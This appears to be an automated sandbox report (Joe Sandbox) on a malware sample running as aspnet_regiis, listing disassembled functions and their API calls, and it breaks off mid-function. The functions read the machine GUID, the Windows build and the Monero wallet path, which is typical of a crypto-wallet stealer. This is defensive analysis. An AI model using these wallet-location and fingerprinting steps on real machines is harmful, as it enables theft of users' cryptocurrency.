                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                              • Opcode ID: 8f5c30eb191db4c26c9681a196f92f3fc574c0453fc2894e1601b125a1dc4168
                                                                                                                                                                              • Instruction ID: f783e17518a0df6a38f59c01f7e43590530c1cd2dbd36aa954159a5d73beedc0
                                                                                                                                                                              • Opcode Fuzzy Hash: 8f5c30eb191db4c26c9681a196f92f3fc574c0453fc2894e1601b125a1dc4168
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C4141B1D40128ABDB209F60DD85BDA7BB9EB08754F0005A5BB09B2191DB309AD5CF54
                                                                                                                                                                              Function 02A0FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 02A0FB52
                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 02A0FB7E
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0FBC1
                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02A0FD17
                                                                                                                                                                                • Part of subcall function 02A0F030: _memmove.LIBCMT ref: 02A0F04A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: OpenProcess_memmove_memset
                                                                                                                                                                              • String ID: N0ZWFt
                                                                                                                                                                              • API String ID: 2647191932-431618156
                                                                                                                                                                              • Opcode ID: dd5c9b57d10a011d95f8495919e338708315d28c0d164e31b7db9db57b4dca85
                                                                                                                                                                              • Instruction ID: bcdbc499d5bb2815c451163bea4aeb21f7831fc831dd4101ec5b2ae22cf0414f
                                                                                                                                                                              • Opcode Fuzzy Hash: dd5c9b57d10a011d95f8495919e338708315d28c0d164e31b7db9db57b4dca85
                                                                                                                                                                              • Instruction Fuzzy Hash: DA519CB1D402289FDF309F64ADC4BEDB7B9AB41304F0004E9A609B7582EE716E89CF55
                                                                                                                                                                              Function 02A115D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A11607
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 02A11626
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 02A1164B
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?), ref: 02A11657
                                                                                                                                                                              • CharToOemA.USER32(?,?), ref: 02A1166B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                              • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                              • API String ID: 2235053359-1211650757
                                                                                                                                                                              • Opcode ID: c9fb6b8cf4f2f257e24f0bc1010f4b10690290b470152bb0d314e2345630658d
                                                                                                                                                                              • Instruction ID: c00b4efbb53bee527b0b2d73403a37d5b13f05012a0153bef8882be792cbfe44
                                                                                                                                                                              • Opcode Fuzzy Hash: c9fb6b8cf4f2f257e24f0bc1010f4b10690290b470152bb0d314e2345630658d
                                                                                                                                                                              • Instruction Fuzzy Hash: 22113CB594022CAFEB10DF90DD89FAAB7BCEB04304F0005E5B619A2041DB709E988F10
                                                                                                                                                                              Function 02A01A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A01A65
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A01A6C
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,02A01AE9), ref: 02A01A89
                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(02A01AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 02A01AA4
                                                                                                                                                                              • RegCloseKey.ADVAPI32(02A01AE9), ref: 02A01AAD
                                                                                                                                                                              Strings
                                                                                                                                                                              • SOFTWARE\monero-project\monero-core, xrefs: 02A01A7F
                                                                                                                                                                              • wallet_path, xrefs: 02A01A9C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                              • API String ID: 3225020163-4244082812
                                                                                                                                                                              • Opcode ID: ee9958845dd4d4894ba70bba8251ad6d25e474f9de8cfc587f464c9f23c6b5be
                                                                                                                                                                              • Instruction ID: 6ae3083c7c350f0c423e2b48c665fdb1e5785794ba3694783710f79485e1c9e6
                                                                                                                                                                              • Opcode Fuzzy Hash: ee9958845dd4d4894ba70bba8251ad6d25e474f9de8cfc587f464c9f23c6b5be
                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF05E75A80314BFFB109B91DC4FFAA7B7CEB44B05F5405A4B702B6081EBB0AA909620
                                                                                                                                                                              Function 02A10B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B44
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10B4B
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A36888,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B79
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02A36888,00000000,00000000,00000000,000000FF,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B95
                                                                                                                                                                              • RegCloseKey.ADVAPI32(02A36888,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B9E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                              • String ID: Windows 11
                                                                                                                                                                              • API String ID: 3225020163-2517555085
                                                                                                                                                                              • Opcode ID: 538f7f993ecda16fff5fb6787337fce37fd667ec957587ab77ff03d5191aab6e
                                                                                                                                                                              • Instruction ID: 7563d0b06339d3b3078d16e40a14f1a3b212cba9e400800d322a8e1bb413d73a
                                                                                                                                                                              • Opcode Fuzzy Hash: 538f7f993ecda16fff5fb6787337fce37fd667ec957587ab77ff03d5191aab6e
                                                                                                                                                                              • Instruction Fuzzy Hash: 15F04471A80314FBEB105B91DC4AF6A7A7DEB48715F5405A4FB01A5080EB70DAE09B10
                                                                                                                                                                              Function 02A10BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A10C1B,02A10B58,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10BBD
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10BC4
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A36888,?,?,?,02A10C1B,02A10B58,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10BE2
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02A36888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,02A10C1B,02A10B58,?,?,?,02A13E95,Windows: ), ref: 02A10BFD
                                                                                                                                                                              • RegCloseKey.ADVAPI32(02A36888,?,?,?,02A10C1B,02A10B58,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10C06
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                              • String ID: CurrentBuildNumber
                                                                                                                                                                              • API String ID: 3225020163-1022791448
                                                                                                                                                                              • Opcode ID: 3e4a12973e32fd6888d99c31ff845cbf58d0b23367aa7166a0d4eb116a481069
                                                                                                                                                                              • Instruction ID: d632568c89971e9f68eaac92af1c51dd43b76215c9afb56e822151c86ac5d0ab
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e4a12973e32fd6888d99c31ff845cbf58d0b23367aa7166a0d4eb116a481069
                                                                                                                                                                              • Instruction Fuzzy Hash: A6F03075A80314BBFB119F90DC4AFAF7A7DEB44B14F140654F601B5080EBB0DAA09B60
                                                                                                                                                                              Function 02A1566F Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A156A4
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 02A156C4
                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 02A156EA
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02A156F6
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15725
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15738
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3891774339-0
                                                                                                                                                                              • Opcode ID: dcb2940165885763f4cffbaba2da3211a141e821cfd22832ebbe56f23acd5244
                                                                                                                                                                              • Instruction ID: 21d913b7c90113faac83a7aefbdbfa36e615d12ef335559ee9fa62c0952dbc0c
                                                                                                                                                                              • Opcode Fuzzy Hash: dcb2940165885763f4cffbaba2da3211a141e821cfd22832ebbe56f23acd5244
                                                                                                                                                                              • Instruction Fuzzy Hash: F7418E71C8022D9FCB14AF60ED85FE9777ABB18314F4009A9A509A3190EE709FE59F90
                                                                                                                                                                              Function 02A07FAC Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                              • LocalFree.KERNEL32(02A0ECBC,?,?,?,?,02A0E756,?,?,?), ref: 02A0802B
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2311089104-0
                                                                                                                                                                              • Opcode ID: a5f9efc8de67578db808a8e119cce9f21dbc9a26360264cf8e31f96f3714bfd9
                                                                                                                                                                              • Instruction ID: a4067cd614bb371f4c0cb034d0d6f53a3881d7ad8fe10130595d90e6e8a3aaa2
                                                                                                                                                                              • Opcode Fuzzy Hash: a5f9efc8de67578db808a8e119cce9f21dbc9a26360264cf8e31f96f3714bfd9
                                                                                                                                                                              • Instruction Fuzzy Hash: F0113070900214EFDF219FA4E8C8FAE7BB8EB48784F200A58F541E6180EB759791DB11
                                                                                                                                                                              Function 02A11757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 02A1175E
                                                                                                                                                                              • CoCreateInstance.COMBASE(02A331B0,00000000,00000001,02A3AF60,?), ref: 02A11781
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 02A1178E
                                                                                                                                                                              • _wtoi64.MSVCRT ref: 02A117C1
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02A117DA
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02A117E1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 181426013-0
                                                                                                                                                                              • Opcode ID: f2f64b2a160984ccefe32ee09f6635e226a4d70918fd72c8792a7e3e2af44a1b
                                                                                                                                                                              • Instruction ID: 890065482dad79ef81ba6b53ebedb1a2339d832b4590255f53d0441751fec0f2
                                                                                                                                                                              • Opcode Fuzzy Hash: f2f64b2a160984ccefe32ee09f6635e226a4d70918fd72c8792a7e3e2af44a1b
                                                                                                                                                                              • Instruction Fuzzy Hash: B8115B75D4424ADFCB019FE4CD88AAEBBB6BF48310F504469F20AE7250CF31994ACB50
                                                                                                                                                                              Function 02A010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 02A010AA
                                                                                                                                                                              • _memset.LIBCMT ref: 02A010D0
